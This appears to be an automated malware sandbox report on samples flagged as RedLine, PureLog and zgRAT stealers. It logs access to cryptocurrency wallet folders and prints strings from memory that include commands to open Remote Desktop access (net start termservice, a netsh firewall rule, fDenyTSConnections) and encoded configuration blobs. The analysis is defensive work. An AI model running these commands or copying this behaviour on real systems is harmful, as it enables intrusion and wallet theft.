Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: EduGeniusX.com	Binary or memory string: WIN_81
Source: EduGeniusX.com	Binary or memory string: WIN_XP
Source: EduGeniusX.com, 00000033.00000000.1638349918.0000000001073000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: EduGeniusX.com	Binary or memory string: WIN_XPe
Source: EduGeniusX.com	Binary or memory string: WIN_VISTA
Source: EduGeniusX.com	Binary or memory string: WIN_7
Source: EduGeniusX.com	Binary or memory string: WIN_8

Source: Yara match	File source: 19.2.PfOHmro.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.PfOHmro.exe.41b4170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.PfOHmro.exe.41b4170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.PfOHmro.exe.4199550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PfOHmro.exe PID: 6776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PfOHmro.exe PID: 4060, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 19.2.PfOHmro.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.PfOHmro.exe.41b4170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.PfOHmro.exe.41b4170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.PfOHmro.exe.4199550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PfOHmro.exe PID: 6776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PfOHmro.exe PID: 4060, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe, type: DROPPED

Contains functionality to start a terminal service

Source: random.exe	String found in binary or memory: net start termservice
Source: random.exe, 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: random.exe, 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: random.exe, 00000000.00000003.889046034.00000000051A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: random.exe, 00000000.00000003.889046034.00000000051A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000003.925833234.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000003.925833234.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000001.00000002.966341892.0000000000D81000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000002.966341892.0000000000D81000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.969111930.0000000000D81000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.969111930.0000000000D81000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 